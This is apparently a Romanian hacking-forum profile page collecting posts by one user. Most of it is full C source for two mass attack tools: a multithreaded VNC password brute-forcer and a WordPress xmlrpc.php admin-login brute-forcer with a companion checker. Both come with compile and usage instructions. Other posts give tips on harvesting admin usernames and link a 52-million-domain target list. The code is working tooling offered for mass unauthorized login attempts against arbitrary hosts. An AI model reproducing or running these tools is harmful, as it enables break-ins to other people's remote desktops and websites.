Everything posted by sssmoke

  1. Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid. Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <openssl/des.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <signal.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <pthread.h> #include <ctype.h> #define RED "\E[1;32;31m" #define GREEN "\E[1;32;40m" #define WHITE "\E[1;37;40m" #define NORMAL "\E[m" #define CLEARLN "\033[F\033[J" #define CONNECT_TIMEOUT 2 #define READ_TIMEOUT 5 #define LOCK(x) pthread_mutex_lock(&x); #define UNLOCK(x) pthread_mutex_unlock(&x); static int maxqueue = 0; static int brutemode = 0; struct host_queue{ char * host; char * pass; struct host_queue * next; }; struct combi { char * host; char * pass; }; static time_t start, lmin; static FILE *ipfile = NULL; static FILE *outfile = NULL; static FILE *passfile = NULL; static int finished = 0; static int done = 0; static int good = 0; static int total = 0; static long qsize = 0; static long lastmin = 0; static int dmin = 0; static struct host_queue * jobs = NULL; static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER; static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER; static void usage(const char *s) { printf(RED"Usage: %s <check|brute>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_check(const char *s) { printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_brute(const char *s) { printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void save_no_auth(const char *host) { FILE *noauth = 
fopen("no.auth", "a+"); fprintf(noauth, "%s\n", host); fclose(noauth); } static void save_vnc_list(const char *host) { FILE *vnclist= fopen("vnc.list", "a+"); fprintf(vnclist, "%s\n", host); fclose(vnclist); } static void queue_job(char *h, char *p) { struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue)); hq->host = h; hq->pass = p; hq->next = NULL; LOCK(job_lock); while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock); if(jobs == NULL) jobs = hq; else { hq->next = jobs; jobs = hq; } ++qsize; pthread_cond_signal(&job_cond); UNLOCK(job_lock); } static struct combi * dequeue_job(void){ struct combi * trynow = (struct combi *) malloc(sizeof(struct combi)); LOCK(job_lock); while(jobs == NULL){ LOCK(stat_lock); if(done == 1){ UNLOCK(stat_lock); UNLOCK(job_lock); free(trynow); return NULL; } UNLOCK(stat_lock); pthread_cond_wait(&job_cond, &job_lock); } trynow->host = jobs->host; trynow->pass = jobs->pass; struct host_queue * hq = jobs; jobs = jobs->next; --qsize; pthread_cond_signal(&job_size_cond); UNLOCK(job_lock); free(hq); return trynow; } static int send_msg(int sockfd, char *message) { int n; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, NULL, &rset, NULL, &timeout); if (n < 0) return -1; else if (n == 0) return -1; else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL); return n; } static int recv_msg(int sockfd, char **retmes) { int n; char *buffer = (char *) malloc(512); bzero(buffer, 512); *retmes = NULL; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, &rset, NULL, NULL, &timeout); if(n <= 0) { free(buffer); return 0; } else n = read(sockfd, buffer, 511); *retmes = buffer; return n; } static char *Encrypt(char *Key, char *Msg, int size, char **dest) { char *Res = NULL; int n=0; DES_cblock Key2, decry, 
plain1, plain2, result1, result2; DES_key_schedule schedule; Res = (char *) malloc(size + 1); bzero(Res, size + 1); memcpy(Key2, Key, 8); memcpy(plain1, Msg, 8); memcpy(plain2, Msg + 8, 8); DES_set_odd_parity( &Key2 ); DES_set_key(&Key2, &schedule ); DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT); DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT); memcpy(Res, result1, 8); memcpy(Res + 8, result2, 8); *dest = Res; return NULL; } static int checknow(const char *host, const char *pass) { int sockfd, rc, i, n = 0, tmax = 0; long arg; unsigned char newkey[8]; bzero(newkey, 8); for (i=0;i<strlen(pass);i++) { int a = pass[i]; int b = 0; int j; for (j=0; j<8; j++) if (a & (1<<j)) b = b | (1<<7-j); unsigned char d = b; newkey[i] = d; } newkey[i] = '\0'; struct sockaddr_in remoteaddr; remoteaddr.sin_family = AF_INET; remoteaddr.sin_addr.s_addr = inet_addr(host); remoteaddr.sin_port = htons(5900); retry: sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) goto retry; struct linger so_linger; so_linger.l_onoff = 1; so_linger.l_linger = 0; struct timeval tv; int valopt; tv.tv_sec = CONNECT_TIMEOUT; tv.tv_usec = 0; if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } char *recbuf = NULL; if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) { if (errno == EINPROGRESS) { fd_set write_fds; memset(&write_fds, 0, sizeof(write_fds)); FD_ZERO(&write_fds); FD_SET(sockfd, &write_fds); if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) { socklen_t lon; lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) goto first; } else goto first; } else goto first; } n = 
recv_msg(sockfd, &recbuf); if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12) goto first; char *proto = malloc(13 * sizeof(char)); bzero(proto, 13); if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n"); else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n"); else sprintf(proto, "RFB 003.003\n"); if(send_msg(sockfd, proto) < 0) { free(proto); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n == 0) { free(proto); goto first; } unsigned char *response = malloc(17 * sizeof(char)); bzero(response, 17); int code; if(proto[10] == '7' || proto[10] == '8') { free(proto); int numberauth = recbuf[0], auth_supported = 0; for(i=1; i<numberauth + 1; i++) { if(recbuf[i] == 1) save_no_auth(host); else if(recbuf[i] == 2) auth_supported = 1; } if(auth_supported == 0) { free(response); goto first; } if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); tmax = 3; free(response); goto first; } char authchar[1]; authchar[0] = '\x02'; if(send_msg(sockfd, authchar) < 0) { free(response); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n != 16) { free(response); goto first; } memcpy(response, recbuf, 16); } else { free(proto); code = recbuf[3]; if(code == 1) { save_no_auth(host); free(response); goto first; } else if(code == 2 && n >= 20) { if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; 
printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); free(response); tmax = 3; goto first; } memcpy(response, recbuf + n - 16, 16); } else { free(response); goto first; } } char *encrypted = NULL; Encrypt(newkey, response, 16, &encrypted); free(response); free(recbuf); if(send_msg(sockfd, encrypted) < 0) { free(encrypted); goto first; } free(encrypted); n = recv_msg(sockfd, &recbuf); if(n != 4) goto first; code = recbuf[3]; long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); if(code == 0) { LOCK(stat_lock); printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass); FILE *logfile = fopen("vnc.good", "a+"); fprintf(logfile, "%s %s\n", host, pass); fclose(logfile); UNLOCK(stat_lock); } first: LOCK(stat_lock); dmin++; finished++; UNLOCK(stat_lock); free(recbuf); close(sockfd); return -1; } static void *worker_thread(void *worker) { while(1) { struct combi *trynow = dequeue_job(); if(trynow == NULL) break; char *host = NULL, *pass = NULL; host = trynow->host; pass = trynow->pass; if(host == NULL || pass == NULL) break; checknow(host, pass); free(trynow); free(host); if(brutemode == 2) free(pass); } pthread_exit(NULL); } int main(int argc, char **argv) { char ip[32] = {0}, pass[32] = {0}; if (argc < 2) usage(argv[0]); if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]); else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]); else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]); if (strcmp(argv[1], "check") == 0) brutemode = 1; 
else if(strcmp(argv[1], "brute") == 0) brutemode = 2; int num_threads; char *list_host = NULL, *list_pass = NULL; if (brutemode == 1) { list_host = argv[2]; num_threads = atoi(argv[3]); } else { list_host = argv[2]; list_pass = argv[3]; num_threads = atoi(argv[4]); } maxqueue = num_threads; if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads); else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads); start = time(0); lmin = time(0); if(!(ipfile = fopen(list_host, "r"))) { printf("INVALID IP FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); char **passwords; int pcount=0; if(brutemode == 2) { if(!(passfile = fopen(list_pass, "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) pcount++; } fclose(passfile); passwords = malloc(pcount * sizeof(char*)); pcount = 0; passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) { passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char)); strcpy(passwords[pcount], pass); pcount++; } } fclose(passfile); } int i; pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads); pthread_attr_t attrs; pthread_attr_init(&attrs); pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED); for(i=0; i<num_threads; i++) { pthread_create(&thread[i], &attrs, worker_thread, NULL); pthread_detach(thread[i]); } if(brutemode == 1) { ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); strcpy(host, ip); 
queue_job(host, "checkmod"); } } fclose(ipfile); } else { int pc=0; for(pc=0; pc<pcount; pc++) { printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]); ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); char *pass = (char *)malloc(strlen(passwords[pc]) + 1); strcpy(host, ip); strcpy(pass, passwords[pc]); queue_job(host, pass); } } fclose(ipfile); } } done=1; for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond); pthread_mutex_destroy(&job_lock); pthread_cond_destroy(&job_cond); sleep(20); free(thread); exit(0); } Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati: ./vnc check listaipuri numarthreaduri Daca doriti sa faceti bruteforce direct: ./vnc brute listaipuri listaparole numarthreaduri Daca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj
  2. La parola poti folosi DOMAIN% sau DOMAIN%123 din astea asa si iti inlocuieste domeniul ex: Google cu google sau google123 cum vrei tu. La useri singurul fel care cred eu ca merge updatat e sa ia userul din pagina ?author=1 ca ala e admin, alti useri nu stiu cat de mult conteaza...
  3. Aici aveti si o lista de 52mil domenii sa nu va plictisiti gangsta.club/xdom.txt
  4. Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == 
EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; 
time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } 
strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = 
fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); 
strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii